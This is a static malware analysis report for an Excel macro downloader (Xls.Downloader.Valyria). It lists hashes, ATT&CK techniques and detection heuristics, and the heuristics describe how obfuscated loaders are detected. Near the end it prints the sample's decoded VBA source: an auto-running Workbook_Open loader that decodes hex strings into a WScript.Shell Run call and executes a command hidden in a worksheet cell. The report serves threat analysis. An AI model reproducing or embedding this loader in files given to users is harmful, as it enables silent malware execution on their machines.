Xls.Downloader.Valyria-6934924-0 — Office (OLE) malware analysis

Static analysis result for SHA-256 cb77406434c4aaac…

MALICIOUS

Office (OLE)

370.5 KB Created: 2018-10-19 06:24:48 Authoring application: Microsoft Excel First seen: 2019-01-20
MD5: 1169e5e198d7bb88b6e2aa98a22aac13 SHA-1: 4fad090dd0d09a8b977a4b302ff2a6cd3e008dc1 SHA-256: cb77406434c4aaacbc5e8d0f0fd1745ee60e917403c35ae9b0a1ad3e222c7414
342 Risk Score

Malware Insights

Xls.Downloader.Valyria-6934924-0 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The file contains both VBA and Excel 4.0 macros, with a Workbook_Open event triggering an obfuscated loader. This loader uses CreateObject and CallByName, indicative of executing a secondary payload. The presence of the 'SE_ENABLE_LURE' heuristic suggests the document prompts the user to enable macros, a common tactic for macro-based downloaders. ClamAV detection further confirms its malicious nature as 'Xls.Downloader.Valyria-6934924-0'.

Heuristics 10

  • ClamAV: Xls.Downloader.Valyria-6934924-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Downloader.Valyria-6934924-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://www.iec.chIn document text (OLE body)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 228 bytes
SHA-256: 7664351f0a0d85b9abaa375dfe4e7ba4453b8cb00ee46cd0afc63112dacb94a2
Preview script
First 1,000 lines of the extracted script
' 0085     12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  Nov
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2671 bytes
SHA-256: 6fc84dcbbca39ba9c98d89370fde61bf4ec60ceffb3047a79c21459c8b14f80a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private Function B_(ByVal T_ As String)
Dim AG_ As String: Dim DBO_ As Long: For DBO_ = 1 To Len(T_) Step 2: AG_ = AG_ & Chr(Val(Chr(23 + (9 * 2) - (1 * 3)) & Chr((20 * 3) + 16 - (24 / 2) + 8) & Mid(T_, DBO_, 2)) - 46): Next: B_ = AG_
End Function
Sub Workbook_Open()
Dim YTVW_ As Long: YTVW_ = 46
Dim LXMU_ As Long
Select Case YTVW_
Case 37 + (73 - 91) + 85 * Round(66 / 55 - 96) * 49
LXMU_ = 3056 - 68
Case 38 / Round(74 * 52 / 44) / 62 + (10 - 30) + 84
LXMU_ = 4932 + 53
Case 75 + (89 - 99) + 51 / Round(83 * 13 / 63) / 55 + (88 - 66) + 21
LXMU_ = 8956 * 95
Case 73 - (83 + 84) - 63 + (97 - 95) + 95
LXMU_ = 5582 * 62
Case 38 + (86 - 68) + 39 / Round(53 * 98 / 42) / 27
LXMU_ = 1491 + 82
Case 89 * Round(66 / 25 - 66) * 9 * Round(15 / 67 - 60) * 31
LXMU_ = 1721 + 47
Case 71 + (25 - 43) + 49 - (85 + 29) - 57 / Round(92 * 21 / 40) / 74
LXMU_ = 8874 + 21
Case 24 + (33 - 41) + 43 * Round(25 / 23 - 84) * 19
LXMU_ = 2807 / 73
Case 25 / Round(81 * 79 / 62) / 61 * Round(47 / 91 - 74) * 46
LXMU_ = 3103 / 12
Case 41 + (17 - 94) + 17 + (42 - 23) + 72 / Round(47 * 9 / 29) / 79
LXMU_ = 2663 / 44
Case 55 * Round(95 / 38 - 84) * 78 - (27 + 37) - 97 * Round(48 / 17 - 42) * 77
LXMU_ = 6816 + 47
Case 22 - (73 + 26) - 36 * Round(25 / 94 - 27) * 62
LXMU_ = 4179 / 79
Case 33 * Round(54 / 32 - 88) * 87 / Round(71 * 46 / 57) / 42 / Round(17 * 49 / 53) / 42
LXMU_ = 1087 * 79
Case 62 + (41 - 11) + 38 - (98 + 10) - 51 / Round(14 * 89 / 73) / 65
LXMU_ = 3678 * 22
Case 83 - (54 + 68) - 96 / Round(41 * 72 / 56) / 75 + (86 - 54) + 43
LXMU_ = 444 + 58
Case 26 - (44 + 64) - 69 / Round(25 * 23 / 80) / 54
LXMU_ = 6807 + 56
Case 70 + (68 - 78) + 45 + (77 - 87) + 20 / Round(60 * 20 / 58) / 51
LXMU_ = 2377 + 32
Case 95 * Round(56 / 42 - 94) * 46 + (46 - 86) + 81
LXMU_ = 2375 - 71
Case 64 + (86 - 81) + 17 + (62 - 68) + 95 * Round(84 / 41 - 46) * 38
LXMU_ = 3225 + 31
Case 17 / Round(77 * 74 / 15) / 21 / Round(14 * 80 / 69) / 67 + (54 - 23) + 64
LXMU_ = 2504 / 34
Case 97 * Round(54 / 43 - 12) * 49 * Round(25 / 61 - 28) * 55 + (43 - 81) + 18
LXMU_ = 7291 / 14
Case 26 - (84 + 68) - 75 / Round(32 * 82 / 33) / 96
LXMU_ = 1330 * 77
Case Else: CallByName CreateObject(B_("858191A0979EA25C8196939A9A")), B_("80A39C"), VbMethod, B_(ThisWorkbook.Sheets("Nova").Range("H231").Value), 0, True
End Select
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.